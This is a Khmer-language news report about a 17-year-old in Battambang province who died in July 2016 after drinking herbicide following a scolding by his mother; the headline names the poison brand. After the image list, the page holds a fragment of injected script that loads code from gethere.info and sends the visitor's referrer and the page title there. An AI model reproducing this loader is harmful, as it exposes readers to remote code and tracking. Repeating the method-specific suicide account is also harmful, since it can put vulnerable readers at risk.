ចិត្តខ្លាំងគ្រាន់តែម្តាយបន្ទោសលេបថ្នាំពុលបាញ់ស្មៅប្រភេទខ្លាំងឆេះម៉ាកកាម៉ាហ្សួន

បាត់ដំបង៖ យុវជនម្នាក់បានសម្រេចចិត្តសម្លាប់់ខ្លួន  ដោយលេបថ្នាំពុល បន្ទាប់ពីម្តាយស្តីបន្ទោសទ្រាំមិនបាន
ហើយត្រូវបានក្រុមគ្រួសារដឹកយកមកសង្រ្គោះជីវិត នៅមន្ទីរពេទ្យបង្អែក ស្រុកសំពៅលូន ខេត្តបាត់ដំបង  ហើយក្រុមគ្រូពេទ្យធ្វើការជួយសង្រ្គោះភ្លាមៗនោះដែរ។ប៉ុន្តែស្ថានភាពយុវជននោះកាន់តែធ្ងន់ខ្លាំង ទៅៗ ត្រដរខ្យល់អន្ទះអន្ទែងថ្នាំពុល ជ្រួតជ្រាបក្នុងខ្លួនខ្លាំងគ្រូពេទ្យអស់លទ្ធភាព មិនអាចព្យាបាល និងគ្មានសង្ឃឹម។ ហេតុការណ៍ភ្ញាក់ផ្អើលនេះបានកើតឡើង កាលពីវេលាម៉ោង៥និង២០នាទីល្ងាច ថ្ងៃទី១៤ ខែកក្កដា ឆ្នាំ២០១៦។

ក្រោយលទ្ធផលគ្មានសង្ឃឹមក្រុមគ្រូពេទ្យសម្រេចឱ្យក្រុមគ្រួសារដឹកតាមរថយន្តពេទ្យត្រឡប់មកផ្ទះវិញ។

យុវជនមានឈ្មោះ ទឹក ម៉ៅ អាយុ១៧ឆ្នាំ ប្រកបមុខរបរធ្វើចំការ រស់នៅក្នុងភូមិត្រាងកណ្តាល ឃុំត្រាង ស្រុកកំរៀង ខេត្តបាត់ដំបង។

 

បើតាមការបញ្ជាក់ឱ្យដឹងពីម្តាយយុវជនខាងលើប្រាប់ថា នៅវេលាម៉ោង៣រសៀលថ្ងៃទី១៤ ខែកក្កដា មុនពេលកើតហេតុគឺគាត់បន្ទោសកូនខ្លាំង។ថាខ្ជិលទៅបាញ់ថ្នាំស្មៅចំការដោយឱ្យឪពុកទៅបាញ់ស្មៅជំនួសវិញ។កូននោះក៏ខឹងហើយវាក៏ទៅផឹកស្រា ទំនងជាស្រវឹង ក៏លួចថ្នាំពុលបាញ់ស្មៅផ្ទះអ្នកជិតខាងយកមកផឹកនៅក្បែររបងផ្ទះគាត់ក៏មិនដឹងនោះដែរ។ក្រោយមកថ្នាំពុលធ្វើទុក្ខបានស្រែកឱ្យគេជួយ ទើបមានការភ្ញាក់ផ្អើលថាកូនលេបថ្នាំពុលសម្លាប់ខ្លួន។ឃើញបែបនេះក្រុមគ្រួសារក៏ដឹកបញ្ជូនតាមរថយន្តរបស់មណ្ឌលសុខភាពឃុំត្រាង មកកាន់មន្ទីរពេទ្យបង្អែកស្រុកសំពៅលូនតែម្តង ។លុះមកដល់មន្ទីរពេទ្យគ្រូពេទ្យពិនិត្យថាគ្មានសង្ឃឹមក៏ត្រូវដឹកយុវជនខាងលើត្រឡប់ទៅផ្ទះវិញរងចាំសេចក្តីស្លាប់។ប្រភពព័ត៌មានចុងក្រោយឱ្យដឹងថាយុវជននោះបានដាច់ខ្យល់ស្លាប់តាមផ្លូវនៅពេលដឹកបញ្ជូនទៅផ្ទះវិញនោះ។

IMG-20160715-WA0050 IMG-20160715-WA0046 IMG-20160715-WA0045 IMG-20160715-WA0041 IMG-20160715-WA0040s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More